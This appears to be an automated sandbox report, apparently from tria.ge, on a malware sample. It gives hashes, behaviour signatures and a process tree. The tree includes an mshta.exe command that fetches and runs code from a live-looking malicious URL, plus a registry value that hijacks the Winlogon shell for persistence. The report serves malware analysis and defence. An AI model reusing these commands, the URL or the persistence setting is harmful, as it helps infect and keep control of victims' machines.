Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
27/06/2024, 21:15
Behavioral task
behavioral1
Sample
178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
Resource
win10v2004-20240611-en
General
-
Target
178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
-
Size
767KB
-
MD5
178e23ce61f1c87fb69a2d23ce241c03
-
SHA1
b87efed82f2472022388981cfdd295c330076adb
-
SHA256
c84b93ea9418e569a419b29a12a34687767b9a5f970fee6b44bee1a535c10f12
-
SHA512
faaea84772419c24c49a1d1f072e19ccecbf6b498de4227b1b649e9fc3109fd46c6bb26ac0aae0c1ab8b883a1664efe8d2c69b09a840af226647f6056bbc4186
-
SSDEEP
12288:TsC/xLjZPUyBiLCCKG3NTJUVtn5OmujtCXh/eBd7cmnRhQpYaKIPPzeNjtH0Q2Pq:Yuj2y+CC99NKtnekRmBhRh9aKIPLotUQ
Malware Config
Extracted
http://repoiury.com/inst.php?id=lee_02&lang=ENU
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\palladium.exe" jh.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation jh.exe -
Executes dropped EXE 2 IoCs
pid Process 2312 jh.exe 2980 jh1.exe -
resource yara_rule behavioral2/memory/1840-1-0x0000000000400000-0x00000000004F1000-memory.dmp upx behavioral2/files/0x0003000000022965-12.dat upx behavioral2/memory/2312-16-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/1840-33-0x0000000000400000-0x00000000004F1000-memory.dmp upx behavioral2/memory/2312-41-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-42-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-43-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-45-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-46-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-47-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-48-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-49-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-50-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-51-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-52-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-53-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-54-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-55-0x0000000000400000-0x0000000000802000-memory.dmp upx behavioral2/memory/2312-56-0x0000000000400000-0x0000000000802000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3184 2980 WerFault.exe 96 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe 2312 jh.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2312 jh.exe 2312 jh.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1840 wrote to memory of 2312 1840 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe 95 PID 1840 wrote to memory of 2312 1840 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe 95 PID 1840 wrote to memory of 2312 1840 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe 95 PID 1840 wrote to memory of 2980 1840 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe 96 PID 1840 wrote to memory of 2980 1840 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe 96 PID 1840 wrote to memory of 2980 1840 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe 96 PID 2312 wrote to memory of 4792 2312 jh.exe 98 PID 2312 wrote to memory of 4792 2312 jh.exe 98 PID 2312 wrote to memory of 4792 2312 jh.exe 98 PID 2312 wrote to memory of 1728 2312 jh.exe 99 PID 2312 wrote to memory of 1728 2312 jh.exe 99 PID 2312 wrote to memory of 1728 2312 jh.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\jh.exe"C:\Users\Admin\AppData\Local\Temp\jh.exe" lee_022⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://repoiury.com/inst.php?id=lee_02&lang=ENU3⤵PID:4792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\asdfasfas.bat" "3⤵PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\jh1.exe"C:\Users\Admin\AppData\Local\Temp\jh1.exe"2⤵
- Executes dropped EXE
PID:2980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 4803⤵
- Program crash
PID:3184
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2980 -ip 29801⤵PID:2348
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4088,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=3688 /prefetch:81⤵PID:1856
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
467KB
MD5c0c286f3d4b4eb46504ae767e371187f
SHA1715e75e7a596d5a88eac7bb47a9b2fdd88653aea
SHA2563264c96f8f77cdf612671e1899898e59bcff46d975f6fa77cc6802183dc7c065
SHA512f999fc28d65edbb074ba1a611543ba9a01f55677b94af037d92ebd0cde42c5077c83b907eb22b4b80dae90c56cf63448548c46ed39732377e66c01327ac0359d
-
Filesize
149KB
MD56ba6b1580ea3f493ad3d9d915b001909
SHA1e3abca7ed8450fdf82013958f3db5f2ab541c2b2
SHA2561fed7b0afe8fc340102514011d6f6605dbe281c190740e2360ab73a1617e2800
SHA512613e739975dfff40f8cd73a163129b7447c09575b44b63ccf9217367726fd13c5626ad7346554b57b0221f5665a2bd326bc9bef9a4475c2b5eeb636bcf101e4c
-
Filesize
122B
MD5fddfbd9d59143c6855c0e386b4af0446
SHA1a60145bf547b703ec4cf078fd955fc690272eb00
SHA256214aca25c648fad0c7f0b799343f07fb24ba4c7df95a0bd0cac13db70e1ea2d0
SHA512a8f6dd937fb6c126994186e2e66a0c5dd8ef796ded55153f5f32bffe93f2743f55db9bb96288ab46201db1339e9b9b3c09d5c41da57ad3b668132cca7aac1003